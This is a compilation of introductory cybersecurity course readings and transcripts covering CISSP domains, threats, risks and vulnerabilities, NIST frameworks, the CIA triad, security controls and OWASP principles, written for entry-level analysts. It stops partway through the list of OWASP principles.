As an analyst, you can explore various areas of cybersecurity that interest you. One way to explore those
areas is by understanding different security domains and how they’re used to organize the work of
security professionals. In this reading you will learn more about CISSP’s eight security domains and how
they relate to the work you’ll do as a security analyst.
Domain one: Security and risk management
All organizations must develop their security posture. Security posture is an organization’s ability to
manage its defense of critical assets and data and react to change. Elements of the security and risk
management domain that impact an organization's security posture include:
●
●
●
●
●
●
Security goals and objectives
Risk mitigation processes
Compliance
Business continuity plans
Legal regulations
Professional and organizational ethics
Information security, or InfoSec, is also related to this domain and refers to a set of processes
established to secure information. An organization may use playbooks and implement training as a part
of their security and risk management program, based on their needs and perceived risk. There are
many InfoSec design processes, such as:
●
●
●
●
●
Incident response
Vulnerability management
Application security
Cloud security
Infrastructure security
As an example, a security team may need to alter how personally identifiable information (PII) is treated
in order to adhere to the European Union's General Data Protection Regulation (GDPR).
Domain two: Asset security
Asset security involves managing the cybersecurity processes of organizational assets, including the
storage, maintenance, retention, and destruction of physical and virtual data. Because the loss or theft of
assets can expose an organization and increase the level of risk, keeping track of assets and the data they
hold is essential. Conducting a security impact analysis, establishing a recovery plan, and managing data
exposure will depend on the level of risk associated with each asset. Security analysts may need to store,
maintain, and retain data by creating backups to ensure they are able to restore the environment if a
security incident places the organization’s data at risk.
Domain three: Security architecture and engineering
This domain focuses on managing data security. Ensuring effective tools, systems, and processes are in
place helps protect an organization’s assets and data. Security architects and engineers create these
processes.
One important aspect of this domain is the concept of shared responsibility. Shared responsibility means
all individuals involved take an active role in lowering risk during the design of a security system.
Additional design principles related to this domain, which are discussed later in the program, include:
●
●
●
●
●
●
●
●
Threat modeling
Least privilege
Defense in depth
Fail securely
Separation of duties
Keep it simple
Zero trust
Trust but verify
An example of managing data is the use of a security information and event management (SIEM) tool to
monitor for flags related to unusual login or user activity that could indicate a threat actor is attempting
to access private data.
Domain four: Communication and network security
This domain focuses on managing and securing physical networks and wireless communications. This
includes on-site, remote, and cloud communications.
Organizations with remote, hybrid, and on-site work environments must ensure data remains secure,
but managing external connections to make certain that remote workers are securely accessing an
organization’s networks is a challenge. Designing network security controls—such as restricted network
access—can help protect users and ensure an organization’s network remains secure when employees
travel or work outside of the main office.
Domain five: Identity and access management
The identity and access management (IAM) domain focuses on keeping data secure. It does this by
ensuring user identities are trusted and authenticated and that access to physical and logical assets is
authorized. This helps prevent unauthorized users, while allowing authorized users to perform their
tasks.
Essentially, IAM uses what is referred to as the principle of least privilege, which is the concept of
granting only the minimal access and authorization required to complete a task. As an example, a
cybersecurity analyst might be asked to ensure that customer service representatives can only view the
private data of a customer, such as their phone number, while working to resolve the customer's issue;
then remove access when the customer's issue is resolved.
Domain six: Security assessment and testing
The security assessment and testing domain focuses on identifying and mitigating risks, threats, and
vulnerabilities. Security assessments help organizations determine whether their internal systems are
secure or at risk. Organizations might employ penetration testers, often referred to as “pen testers,” to
find vulnerabilities that could be exploited by a threat actor.
This domain suggests that organizations conduct security control testing, as well as collect and analyze
data. Additionally, it emphasizes the importance of conducting security audits to monitor for and reduce
the probability of a data breach. To contribute to these types of tasks, cybersecurity professionals may
be tasked with auditing user permissions to validate that users have the correct levels of access to
internal systems.
Domain seven: Security operations
The security operations domain focuses on the investigation of a potential data breach and the
implementation of preventative measures after a security incident has occurred. This includes using
strategies, processes, and tools such as:
●
●
●
●
●
●
●
●
●
Training and awareness
Reporting and documentation
Intrusion detection and prevention
SIEM tools
Log management
Incident management
Playbooks
Post-breach forensics
Reflecting on lessons learned
The cybersecurity professionals involved in this domain work as a team to manage, prevent, and
investigate threats, risks, and vulnerabilities. These individuals are trained to handle active attacks, such
as large amounts of data being accessed from an organization's internal network, outside of normal
working hours. Once a threat is identified, the team works diligently to keep private data and
information safe from threat actors.
Domain eight: Software development security
The software development security domain is focused on using secure programming practices and
guidelines to create secure applications. Having secure applications helps deliver secure and reliable
services, which helps protect organizations and their users.
Security must be incorporated into each element of the software development life cycle, from design and
development to testing and release. To achieve security, the software development process must have
security in mind at each step. Security cannot be an afterthought.
Performing application security tests can help ensure vulnerabilities are identified and mitigated
accordingly. Having a system in place to test the programming conventions, software executables, and
security measures embedded in the software is necessary. Having quality assurance and pen tester
professionals ensure the software has met security and performance standards is also an essential part
of the software development process. For example, an entry-level analyst working for a pharmaceutical
company might be asked to make sure encryption is properly configured for a new medical device that
will store private patient data.
Key takeaways
In this reading, you learned more about the focus areas of the eight CISSP security domains. In addition,
you learned about InfoSec and the principle of least privilege. Being familiar with these security domains
and related concepts will help you gain insight into the field of cybersecurity.
Threats, Risks and Vulnerabilities
As an entry-level security analyst,one of your many roles will be to handle an organization's digital and
physical assets. As a reminder, an asset is an item perceived as having value to an organization. During
their lifespan, organizations acquire all types of assets, including physical office spaces, computers,
customers' PII, intellectual property, such as patents or copyrighted
data, and so much more. Unfortunately, organizations operate in an environment that presents multiple
security threats, risks, and vulnerabilities to their assets. Let's review what threats, risks,
and vulnerabilities are and discuss some common examples of each. A threat is any circumstance or
event that can negatively impact assets. One example of a threat is a social engineering attack. Social
engineering is a manipulation technique that exploits human error to gain private information, access,
or valuables. Malicious links in email messages that look like they're from legitimate companies or
people is one method of social engineering known as phishing. As a reminder, phishing is a technique
that is used to acquire sensitive data, such as usernames, passwords, or banking information. Risks are
different from threats. A risk is anything that can impact the confidentiality, integrity, or availability of an
asset. Think of a risk as the likelihood of a threat occurring. An example of a risk to an organization
might be the lack of backup protocols for making sure its stored information can be recovered in the
event of an accident or security incident. Organizations tend to rate risks at different levels: low,
medium, and high, depending on possible threats and the value of an asset. A low-risk asset is
information that would not harm the organization's reputation or ongoing operations and would not
cause financial damage if compromised. This includes public information such as website content, or
published research data. A medium-risk asset might include information that's not available to the public
and may cause some damage to the organization's finances, reputation, or ongoing operations. For
example, the early release of a company's quarterly earnings could impact the value of their stock. A
high-risk asset is any information protected by regulations or laws, which if compromised, would have a
severe negative impact on an organization's finances, ongoing operations, or reputation. This could
include leaked assets with SPII, PII, or intellectual property. Now, let's discuss vulnerabilities. A
vulnerability is a weakness that can be exploited by a threat. And it's worth noting that both a
vulnerability and threat must be present for there to be a risk. Examples of vulnerabilities include: an
outdated firewall, software, or application; weak passwords; or unprotected confidential data. People
can also be considered a vulnerability. People's actions can significantly affect an organization's internal
network. Whether it's a client, external vendor, or employee, maintaining security must be a united
effort. So entry-level analysts need to educate and empower people to be more security conscious. For
example, educating people on how to identify a phishing email is a great starting point. Using access
cards to grant employee access to physical spaces while restricting outside visitors is another good
security measure. Organizations must continually improve their efforts when it comes to identifying and
mitigating vulnerabilities to minimize threats and risks. Entry-level analysts can support this goal by
encouraging employees to report suspicious activity and
actively monitoring and documenting employees' access to critical assets. Now that you're familiar with
some of the threats, risks, and vulnerabilities analysts frequently encounter, coming up, we'll discuss
how they impact business operations.
Key Impacts of Threats, Risks, and Vulnerabilities
In this video, we'll discuss an expensive type of malware called ransomware. Then we'll cover three key
impacts of threats, risks, and vulnerabilities on organizational operations. Ransomware is a malicious
attack where threat actors encrypt an organization's data then demand payment to restore access. Once
ransomware is deployed by an attacker, it can freeze network systems, leave devices unusable, and
encrypt, or lock confidential data, making devices inaccessible. The threat actor then demands a ransom
before providing a decryption key to allow organizations to return to
their normal business operations. Think of a decryption key as a password provided to regain access to
your data. Note that when ransom negotiations occur or data is leaked by threat actors, these events can
occur through the dark web. While many people use search engines to navigate to their social media
accounts or to shop online, this is only a small part of what the web really is. The web is an interlinked
network of online content that's made up of three layers: the surface web, the deep web, and the dark
web. The surface web is the layer that most people use. It contains content that can be accessed using a
web browser. The deep web generally requires authorization to access it. An organization's intranet is
an example of the deep web, since it can only be accessed by employees or others who have been
granted access. Lastly, the dark web can only be accessed by using special software. The dark web
generally carries a negative connotation since it is the preferred web layer for criminals because of the
secrecy that it provides. Now, let's discuss three key impacts of threats, risks, and vulnerabilities. The
first impact we'll discuss is financial impact. When an organization's assets are compromised by an
attack, such as the use of malware, the financial consequences can be significant for a variety of reasons.
These can include interrupted
production and services, the cost to correct the issue, and fines if assets are compromised because of
non-compliance with laws and regulations. The second impact is identity theft. Organizations must
decide whether to store private customer, employee, and outside vendor data, and
for how long. Storing any type of sensitive data presents a risk to the organization. Sensitive data can
include personally identifiable information, or PII, which can be sold or leaked through the dark web.
That's because the dark web provides a sense of secrecy and threat actors may have the ability to sell
data there without facing legal consequences. The last impact we'll discuss is damage
to an organization's reputation. A solid customer base supports an organization's mission, vision, and
financial goals. An exploited vulnerability can lead customers to seek new business relationships with
competitors or create bad press that causes permanent damage to an organization's reputation. The loss
of customer data doesn't only affect an organization's reputation and financials, it may also result in
legal penalties and fines. Organizations are strongly encouraged to take proper security measures and
follow certain protocols to prevent the significant impact of threats, risks, and vulnerabilities. By using
all the tools in their toolkit, security teams are better prepared to handle an event such as a ransomware
attack.
NIST risk management framework's seven steps for managing risk.
As you might remember from earlier in the program, the National Institute of Standards and
Technology, NIST, provides many frameworks that are used by security professionals to manage
risks, threats, and vulnerabilities. In this video, we're going to focus on NIST's Risk Management
Framework or RMF. As an entry-level analyst, you may not engage in
all of these steps, but it's important to be familiar with this framework. Having a solid
foundational understanding of how to mitigate and manage risks can set yourself apart from
other candidates as you begin your job search in the field of security. There are seven steps in the
RMF: prepare, categorize, select, implement, assess,
authorize, and monitor. Let's start with:
Step one, prepare. Prepare refers to activities that are necessary to manage security and privacy
risks before a breach occurs. As an entry-level analyst, you'll likely use this step to monitor for risks
and identify controls that can be used to reduce those risks.
Step two is categorize, which is used to develop risk management
processes and tasks. Security professionals then use those processes and develop tasks by thinking
about how the confidentiality, integrity, and availability of systems and information
can be impacted by risk. As an entry-level analyst, you'll need to be able
to understand how to follow the processes established by your organization to reduce risks to
critical assets, such as private customer information.
Step three is select. Select means to choose, customize, and capture documentation of the controls
that protect an organization. An example of the select step would be keeping a playbook up-to-date
or helping to manage other documentation that allows you and your team to address issues more
efficiently.
Step four is to implement security and privacy plans for the organization. Having good plans in place
is essential for minimizing the impact of ongoing security risks. For example, if you notice a pattern
of employees constantly needing password resets, implementing a change to password
requirements may help solve this issue.
Step five is assess. Assess means to determine if established controls are implemented correctly. An
organization always wants to operate as efficiently as possible. So it's essential to take the time to
analyze whether the implemented protocols, procedures, and controls that are in place are meeting
organizational needs. During this step, analysts identify potential weaknesses and determine
whether the organization's tools, procedures, controls, and protocols should be changed to better
manage potential risks.
Step six is authorize. Authorize means being accountable for the security and privacy risks that may
exist in an organization. As an analyst, the authorization step could involve generating reports,
developing plans of action, and establishing project milestones that are aligned to your
organization's security goals.
Step seven is monitor. Monitor means to be aware of how systems are operating. Assessing and
maintaining technical operations are tasks that analysts complete daily. Part of maintaining a low
level of risk for an organization is knowing how the current systems support the organization's
security goals. If the systems in place don't meet those goals, changes may be needed. Although it
may not be your job to establish these procedures, you will need to make sure they're working as
intended so that risks to the organization itself, and the people it serves, are minimized.
Manage common threats, risks, and vulnerabilities
Previously, you learned that security involves protecting organizations and people from threats, risks,
and vulnerabilities. Understanding the current threat landscapes gives organizations the ability to create
policies and processes designed to help prevent and mitigate these types of security issues. In this
reading, you will further explore how to manage risk and some common threat actor tactics and
techniques, so you are better prepared to protect organizations and the people they serve when you
enter the cybersecurity field.
Risk management
A primary goal of organizations is to protect assets. An asset is an item perceived as having value to an
organization. Assets can be digital or physical. Examples of digital assets include the personal
information of employees, clients, or vendors, such as:
●
●
●
●
Social Security Numbers (SSNs), or unique national identification numbers assigned to
individuals
Dates of birth
Bank account numbers
Mailing addresses
Examples of physical assets include:
●
●
●
●
Payment kiosks
Servers
Desktop computers
Office spaces
Some common strategies used to manage risks include:
●
●
●
●
Acceptance: Accepting a risk to avoid disrupting business continuity
Avoidance: Creating a plan to avoid the risk altogether
Transference: Transferring risk to a third party to manage
Mitigation: Lessening the impact of a known risk
Additionally, organizations implement risk management processes based on widely accepted
frameworks to help protect digital and physical assets from various threats, risks, and vulnerabilities.
Examples of frameworks commonly used in the cybersecurity industry include the National Institute of
Standards and Technology Risk Management Framework (NIST RMF) and Health Information Trust
Alliance (HITRUST).
Following are some common types of threats, risks, and vulnerabilities you’ll help organizations manage
as a security professional.
Today’s most common threats, risks, and vulnerabilities
Threats
A threat is any circumstance or event that can negatively impact assets. As an entry-level security
analyst, your job is to help defend the organization’s assets from inside and outside threats. Therefore,
understanding common types of threats is important to an analyst’s daily work. As a reminder, common
threats include:
●
●
Insider threats: Staff members or vendors abuse their authorized access to obtain data that may
harm an organization.
Advanced persistent threats (APTs): A threat actor maintains unauthorized access to a system
for an extended period of time.
Risks
A risk is anything that can impact the confidentiality, integrity, or availability of an asset. A basic formula
for determining the level of risk is that risk equals the likelihood of a threat. One way to think about this
is that a risk is being late to work and threats are traffic, an accident, a flat tire, etc.
There are different factors that can affect the likelihood of a risk to an organization’s assets, including:
●
●
●
●
●
External risk: Anything outside the organization that has the potential to harm organizational
assets, such as threat actors attempting to gain access to private information
Internal risk: A current or former employee, vendor, or trusted partner who poses a security risk
Legacy systems: Old systems that might not be accounted for or updated, but can still impact
assets, such as workstations or old mainframe systems. For example, an organization might have
an old vending machine that takes credit card payments or a workstation that is still connected
to the legacy accounting system.
Multiparty risk: Outsourcing work to third-party vendors can give them access to intellectual
property, such as trade secrets, software designs, and inventions.
Software compliance/licensing: Software that is not updated or in compliance, or patches that
are not installed in a timely manner
There are many resources, such as the NIST, that provide lists of cybersecurity risks. Additionally, the
Open Web Application Security Project (OWASP) publishes a standard awareness document about the
top 10 most critical security risks to web applications, which is updated regularly.
Note: The OWASP’s common attack types list contains three new risks for the years 2017 to 2021:
insecure design, software and data integrity failures, and server-side request forgery. This update
emphasizes the fact that security is a constantly evolving field. It also demonstrates the importance of
staying up to date on current threat actor tactics and techniques, so you can be better prepared to
manage these types of risks.
Vulnerabilities
A vulnerability is a weakness that can be exploited by a threat. Therefore, organizations need to
regularly inspect for vulnerabilities within their systems. Some vulnerabilities include:
●
●
●
●
●
●
ProxyLogon: A pre-authenticated vulnerability that affects the Microsoft Exchange server. This
means a threat actor can complete a user authentication process to deploy malicious code from
a remote location.
ZeroLogon: A vulnerability in Microsoft’s Netlogon authentication protocol. An authentication
protocol is a way to verify a person's identity. Netlogon is a service that ensures a user’s identity
before allowing access to a website's location.
Log4Shell: Allows attackers to run Java code on someone else’s computer or leak sensitive
information. It does this by enabling a remote attacker to take control of devices connected to
the internet and run malicious code.
PetitPotam: Affects Windows New Technology Local Area Network (LAN) Manager (NTLM). It is
a theft technique that allows a LAN-based attacker to initiate an authentication request.
Security logging and monitoring failures: Insufficient logging and monitoring capabilities that
result in attackers exploiting vulnerabilities without the organization knowing it
Server-side request forgery: Allows attackers to manipulate a server-side application into
accessing and updating backend resources. It can also allow threat actors to steal data.
As an entry-level security analyst, you might work in vulnerability management, which is monitoring a
system to identify and mitigate vulnerabilities. Although patches and updates may exist, if they are not
applied, intrusions can still occur. For this reason, constant monitoring is important. The sooner an
organization identifies a vulnerability and addresses it by patching it or updating their systems, the
sooner it can be mitigated, reducing the organization’s exposure to the vulnerability.
To learn more about the vulnerabilities explained in this section of the reading, as well as other
vulnerabilities, explore the NIST National Vulnerability Database and CISA Known Exploited
Vulnerabilities Catalog.
Key takeaways
In this reading, you learned about some risk management strategies and frameworks that can be used to
develop organization-wide policies and processes to mitigate threats, risks, and vulnerabilities. You also
learned about some of today’s most common threats, risks, and vulnerabilities to business operations.
Understanding these concepts can better prepare you to not only protect against, but also mitigate, the
types of security-related issues that can harm organizations and people alike.
Resources for more information
To learn more, click the linked terms in this reading. Also, consider exploring the following sites:
●
●
OWASP Top Ten
NIST RMF
Glossary terms from module 1
Terms and definitions from Course 2, Module 1
Assess: The fifth step of the NIST RMF that means to determine if established controls are implemented
correctly
Authorize: The sixth step of the NIST RMF that refers to being accountable for the security and privacy
risks that may exist in an organization
Business continuity: An organization's ability to maintain their everyday productivity by establishing
risk disaster recovery plans
Categorize: The second step of the NIST RMF that is used to develop risk management processes and
tasks
External threat: Anything outside the organization that has the potential to harm organizational assets
Implement: The fourth step of the NIST RMF that means to implement security and privacy plans for an
organization
Internal threat: A current or former employee, external vendor, or trusted partner who poses a security
risk
Monitor: The seventh step of the NIST RMF that means be aware of how systems are operating
Prepare: The first step of the NIST RMF related to activities that are necessary to manage security and
privacy risks before a breach occurs
Ransomware: A malicious attack where threat actors encrypt an organization’s data and demand
payment to restore access
Risk: Anything that can impact the confidentiality, integrity, or availability of an asset
Risk mitigation: The process of having the right procedures and rules in place to quickly reduce the
impact of a risk like a breach
Security posture: An organization’s ability to manage its defense of critical assets and data and react to
change
Select: The third step of the NIST RMF that means to choose, customize, and capture documentation of
the controls that protect an organization
Shared responsibility: The idea that all individuals within an organization take an active role in lowering
risk and maintaining both physical and virtual security
Social engineering: A manipulation technique that exploits human error to gain private information,
access, or valuables
Vulnerability: A weakness that can be exploited by a threat
Security Frameworks and Controls
In this section of the course, we'll discuss security frameworks, controls, and design principles in more
detail, and how they can be applied to security audits to help protect organizations and people. The NIST
Cybersecurity Framework plays a large part in this. The framework ensures the protection and
compliance of customer tools and personal work devices through the use of security controls.
Frameworks
In an organization, plans are put in place to protect against a variety of threats,
risks, and vulnerabilities. However, the requirements used to protect organizations and people
often overlap. Because of this, organizations use security frameworks as a starting point to create
their own security policies and processes. Let's start by quickly reviewing what frameworks are.
Security frameworks are guidelines used for building plans to help mitigate risks and threats to
data and privacy, such as social engineering attacks and ransomware. Security involves more than
just the virtual space. It also includes the physical, which is why many organizations have plans to
maintain safety in the work environment. For example, access to a building may require using a key
card or badge. Other security frameworks provide guidance for how to prevent, detect, and respond
to security breaches. This is particularly important when trying to protect an organization from
social engineering attacks like phishing that target their employees. Remember, people are the
biggest threat to security. So frameworks can be used to create plans that increase employee
awareness and educate them about how they can protect the organization, their co-workers, and
themselves. Educating employees about existing security challenges is essential for minimizing the
possibility of a breach. Providing employee training about how to recognize red flags, or potential
threats, is essential, along with having plans in place to quickly report and address security issues. As
an analyst, it will be important for you to understand and implement the plans your organization has in
place to keep the organization, its employees, and the people it serves safe from social engineering
attacks, breaches, and other harmful security incidents. Coming up, we'll review and discuss security
controls, which are used alongside frameworks to achieve an organization's security goals.
Controls
While frameworks are used to create plans to address security risks, threats, and vulnerabilities,
controls are used to reduce specific risks. If proper controls are not in place, an organization could
face significant financial impacts and damage to their reputation because of exposure to risks
including trespassing, creating fake employee accounts, or providing free benefits. Let's review the
definition of controls. Security controls are safeguards designed to reduce
specific security risks. In this video, we'll discuss three common types of controls: encryption,
authentication, and authorization.
Encryption is the process of converting data from a readable format to an encoded format. Typically,
encryption involves converting data from plaintext to ciphertext. Ciphertext is the raw, encoded
message that's unreadable to humans and computers. Ciphertext data cannot be read until it's been
decrypted into its original plaintext form. Encryption is used to ensure confidentiality of sensitive
data, such as customers' account information or social security numbers. Another control that can
be used to protect sensitive data is authentication.
Authentication is the process of verifying who someone or something is. A real-world example of
authentication is logging into a website with your username and password. This basic form of
authentication proves that you know the username and password and should be allowed to access
the website. More advanced methods of authentication, such as multi-factor authentication, or MFA,
challenge the user to demonstrate that they are who they claim to be by requiring both a password
and an additional form of authentication, like security code or biometrics, such as a fingerprint,
voice, or face scan. Biometrics are unique physical characteristics that can be used to verify a
person's identity. Examples of biometrics are a fingerprint, an eye scan, or a palm scan. One example
of a social engineering attack that can exploit biometrics is vishing. Vishing is the exploitation of
electronic voice communication to obtain sensitive information or to impersonate a known source.
For example, vishing could be used to impersonate a person's voice to steal their identity and then
commit a crime. Another very important security control is authorization.
Authorization refers to the concept of granting access to specific resources within a system.
Essentially, authorization is used to verify that a person has permission to access a resource. As an
example, if you're working as an entry-level security analyst for the federal government, you could
have permission to access data through the deep web or other internal data that is only accessible if
you're a federal employee. The security controls we discussed today are only one element of a core
security model known as the CIA triad. The relationship between frameworks and controls
Previously, you learned how organizations use security frameworks and controls to protect against
threats, risks, and vulnerabilities. This included discussions about the National Institute of Standards
and Technology’s (NIST’s) Risk Management Framework (RMF) and Cybersecurity Framework (CSF), as
well as the confidentiality, integrity, and availability (CIA) triad. In this reading, you will further explore
security frameworks and controls and how they are used together to help mitigate organizational risk.
Frameworks and controls
Security frameworks are guidelines used for building plans to help mitigate risk and threats to data and
privacy. Frameworks support organizations’ ability to adhere to compliance laws and regulations. For
example, the healthcare industry uses frameworks to comply with the United States’ Health Insurance
Portability and Accountability Act (HIPAA), which requires that medical professionals keep patient
information safe.
Security controls are safeguards designed to reduce specific security risks. Security controls are the
measures organizations use to lower risk and threats to data and privacy. For example, a control that
can be used alongside frameworks to ensure a hospital remains compliant with HIPAA is requiring that
patients use multi-factor authentication (MFA) to access their medical records. Using a measure like
MFA to validate someone’s identity is one way to help mitigate potential risks and threats to private
data.
Specific frameworks and controls
There are many different frameworks and controls that organizations can use to remain compliant with
regulations and achieve their security goals. Frameworks covered in this reading are the Cyber Threat
Framework (CTF) and the International Organization for Standardization/International Electrotechnical
Commission (ISO/IEC) 27001. Several common security controls, used alongside these types of
frameworks, are also explained.
Cyber Threat Framework (CTF)
According to the Office of the Director of National Intelligence, the CTF was developed by the U.S.
government to provide “a common language for describing and communicating information about cyber
threat activity.” By providing a common language to communicate information about threat activity, the
CTF helps cybersecurity professionals analyze and share information more efficiently. This allows
organizations to improve their response to the constantly evolving cybersecurity landscape and threat
actors' many tactics and techniques.
International Organization for Standardization/International Electrotechnical Commission
(ISO/IEC) 27001
An internationally recognized and used framework is ISO/IEC 27001. The ISO 27000 family of standards
enables organizations of all sectors and sizes to manage the security of assets, such as financial
information, intellectual property, employee data, and information entrusted to third parties. This
framework outlines requirements for an information security management system, best practices, and
controls that support an organization’s ability to manage risks. Although the ISO/IEC 27001 framework
does not require the use of specific controls, it does provide a collection of controls that organizations
can use to improve their security posture.
Controls
Controls are used alongside frameworks to reduce the possibility and impact of a security threat, risk, or
vulnerability. Controls can be physical, technical, and administrative and are typically used to prevent,
detect, or correct security issues.
Examples of physical controls:
●
●
●
●
Gates, fences, and locks
Security guards
Closed-circuit television (CCTV), surveillance cameras, and motion detectors
Access cards or badges to enter office spaces
Examples of technical controls:
●
●
●
Firewalls
MFA
Antivirus software
Examples of administrative controls:
●
●
●
Separation of duties
Authorization
Asset classification
To learn more about controls, particularly those used to protect health-related assets from a variety of
threat types, review the U.S. Department of Health and Human Services’ Physical Access Control
presentation.
Key takeaways
Cybersecurity frameworks and controls are used together to establish an organization’s security
posture. They also support an organization’s ability to meet security goals and comply with laws and
regulations. Although these frameworks and controls are typically voluntary, organizations are strongly
encouraged to implement and use them to help ensure the safety of critical assets.
Explore the CIA Triad
The CIA triad is a model that helps inform how organizations consider risk when setting up systems
and security policies. As a reminder, the three letters in the CIA triad stand for confidentiality,
integrity, and availability. As an entry-level analyst, you'll find yourself constantly referring to these
three core principles as you work to protect your organization and the people it serves.
Confidentiality means that only authorized users can access specific assets or data. Sensitive data
should be available on a "need to know" basis, so that only the people who are authorized to handle
certain assets or data have access. Integrity means that the data is correct, authentic, and reliable.
Determining the integrity of data and analyzing how it's used will help you, as a security
professional, decide whether the data can or cannot be trusted. Availability means that the data is
accessible to those who are authorized to access it. Inaccessible data isn't useful and can prevent
people from being able to do their jobs. As a security professional, ensuring that systems, networks,
and applications are functioning properly to allow for timely and reliable access, may be a part of
your everyday work responsibilities. Now that we've defined the CIA triad and its components, let's
explore how you might use the CIA triad to protect an organization. If you work for an organization
that has large amounts of private data like a bank, the principle of confidentiality is essential
because the bank must keep people's personal and financial information safe. The principle of
integrity is also a priority. For example, if a person's spending habits or purchasing locations
change dramatically, the bank will likely disable access to the account until they can verify that the
account owner, not a threat actor, is actually the one making purchases. The availability principle is
also critical. Banks put a lot of effort into making sure that people can access their account
information easily on the web. And to make sure that information is protected from threat actors,
banks use a validation process to help minimize damage if they suspect that customer accounts
have been compromised. As an analyst, you'll regularly use each component of the triad to help
protect your organization and the people it serves. And having the CIA triad constantly in mind, will
help you keep sensitive data and assets safe from a variety of threats, risks, and vulnerabilities
including the social engineering attacks, malware, and data theft we discussed earlier.
Use the CIA triad to protect organizations
Previously, you were introduced to the confidentiality, integrity, and availability (CIA) triad and how it
helps organizations consider and mitigate risk. In this reading, you will learn how cybersecurity analysts
use the CIA triad in the workplace.
The CIA triad for analysts
The CIA triad is a model that helps inform how organizations consider risk when setting up systems and
security policies. It is made up of three elements that cybersecurity analysts and organizations work
toward upholding: confidentiality, integrity, and availability. Maintaining an acceptable level of risk and
ensuring systems and policies are designed with these elements in mind helps establish a successful
security posture, which refers to an organization’s ability to manage its defense of critical assets and
data and react to change.
Confidentiality
Confidentiality is the idea that only authorized users can access specific assets or data. In an
organization, confidentiality can be enhanced through the implementation of design principles, such as
the principle of least privilege. The principle of least privilege limits users' access to only the
information they need to complete work-related tasks. Limiting access is one way of maintaining the
confidentiality and security of private data.
Integrity
Integrity is the idea that the data is verifiably correct, authentic, and reliable. Having protocols in place
to verify the authenticity of data is essential. One way to verify data integrity is through cryptography,
which is used to transform data so unauthorized parties cannot read or tamper with it (NIST, 2022).
Another example of how an organization might implement integrity is by enabling encryption, which is
the process of converting data from a readable format to an encoded format. Encryption can be used to
prevent access and ensure data, such as messages on an organization's internal chat platform, cannot be
tampered with.
Availability
Availability is the idea that data is accessible to those who are authorized to use it. When a system
adheres to both availability and confidentiality principles, data can be used when needed. In the
workplace, this could mean that the organization allows remote employees to access its internal
network to perform their jobs. It’s worth noting that access to data on the internal network is still
limited, depending on what type of access employees need to do their jobs. If, for example, an employee
works in the organization’s accounting department, they might need access to corporate accounts but
not data related to ongoing development projects.
Key takeaways
The CIA triad is essential for establishing an organization’s security posture. Knowing what it is and how
it’s applied can help you better understand how security teams work to protect organizations and the
people they serve.
NIST Frameworks
Organizations use frameworks as a starting point to develop
plans that mitigate risks, threats, and vulnerabilities to sensitive data and assets. Fortunately, there
are organizations worldwide that create frameworks
security professionals can use to develop those plans. In this video, we'll
discuss two of the National Institute of
Standards and Technology, or NIST's frameworks that can support ongoing security efforts for all
types of organizations, including for profit and nonprofit businesses, as well as government
agencies. While NIST is a US based organization, the guidance it provides can help analysts all over
the world understand how to implement essential cybersecurity practices. One NIST framework
that we'll discuss throughout the program is the NIST Cybersecurity Framework, or CSF. The CSF is
a voluntary framework that consists of standards, guidelines, and best practices to manage
cybersecurity risk. This framework is widely respected and essential for maintaining security
regardless of the organization you work for. The CSF consists of five important core functions,
identify, protect, detect, respond, and recover, which we'll discuss in detail in a future video. For
now, we'll focus on how the CSF benefits organizations and how it can be used to protect against
threats, risks, and vulnerabilities by providing a workplace example. Imagine that one morning you
receive a high-risk notification that a workstation has been compromised. You identify the
workstation, and discover that there's an unknown device plugged into it. You block the unknown
device remotely to stop any potential threat and protect the organization. Then you remove the
infected workstation to prevent the spread of the damage and use tools to detect any additional
threat actor behavior and identify the unknown device. You respond by investigating the incident to
determine who used the unknown device, how the threat occurred, what was affected, and where
the attack originated. In this case, you discover that an employee was charging their infected phone
using a USB port on their work laptop. Finally, you do your best to recover any files or data that
were affected and correct any damage the threat caused to the workstation itself. As demonstrated
by the previous example, the core functions of the NIST CSF provide specific guidance and direction
for security
professionals. This framework is used to develop plans to handle an incident appropriately
and quickly to lower risk, protect an organization against a threat, and mitigate any potential
vulnerabilities. The NIST CSF also expands into the protection of the United States federal
government with NIST special publication, or SP 800-53. It provides a unified framework for
protecting the security of information systems within the federal government, including the
systems provided by private companies for federal government use. The security controls provided
by this framework are used to maintain the CIA triad for those systems used by the government.
Isn't it amazing how all these frameworks and controls work together? We've discussed some
important security topics in this video that will be very useful for you as you continue your security
journey. Because they're core elements of the security profession, the NIST CSF is a useful
framework that most security professionals are familiar with, and understanding the NIST, SP 80053 is crucial if you have an interest in working for the US federal government.
Explore the five functions of the NIST Cybersecurity Framework
NIST CSF focuses on five core functions: identify, protect, detect, respond, and recover. These core
functions help organizations manage cybersecurity risks, implement risk
management strategies and learn from previous mistakes. Basically, when it comes to security
operations, NIST CSF functions are key for making sure an organization is protected against
potential threats, risks, and vulnerabilities.
The first core function is identify, which is related to the management of cybersecurity risk and its
effect on an organization's people and assets. For example, as a security analyst, you may be asked
to monitor systems and devices in your organization's internal network to identify potential
security issues
The second core function is protect, which is the strategy used to protect an organization through
the implementation of policies, procedures, training, and tools that help mitigate
cybersecurity threats. For example, as a security analyst, you and your team might encounter new
and unfamiliar threats and attacks. For this reason, studying historical data and making
improvements to policies and procedures is essential.
The third core function is detect, which means identifying potential security incidents and
improving monitoring capabilities to increase the speed and efficiency of detections. For example,
as an analyst, you might be asked to review a new security tool's setup to make sure it's flagging
low, medium, or high risk, and then alerting the security team about any potential threats or
incidents.
The fourth function is respond, which means making sure that the proper procedures are used to
contain, neutralize, and analyze security incidents, and implement improvements to the security
process. As an analyst, you could be working with a team to collect and organize data to document
an incident and suggest improvements to processes to prevent the incident from happening again.
The fifth core function is recover, which is the process of returning affected systems back to normal
operation. For example, as an entry-level security analyst, you might work with
your security team to restore systems, data, and assets, such as financial or legal files, that have
been affected by an incident like a breach.
From proactive to reactive measures, all five functions are essential for making sure
that an organization has effective security strategies in place. Security incidents are going to
happen, but an organization must have the ability to quickly recover from any damage caused by an
incident to minimize their level of risk.
OWASP security principles
Open Web Application Security Project, recently renamed Open Worldwide Application
Security Project® (OWASP), security principles and how entry-level analysts use them.
Security principles
In the workplace, security principles are embedded in your daily tasks. Whether you are
analyzing logs, monitoring a security information and event management (SIEM)
dashboard, or using a vulnerability scanner, you will use these principles in some way.
Previously, you were introduced to several OWASP security principles. These included:
●
●
●
●
●
Minimize attack surface area: Attack surface refers to all the potential vulnerabilities
a threat actor could exploit.
Principle of least privilege: Users have the least amount of access required to
perform their everyday tasks.
Defense in depth: Organizations should have varying security controls that mitigate
risks and threats.
Separation of duties: Critical actions should rely on multiple people, each of whom
follow the principle of least privilege.
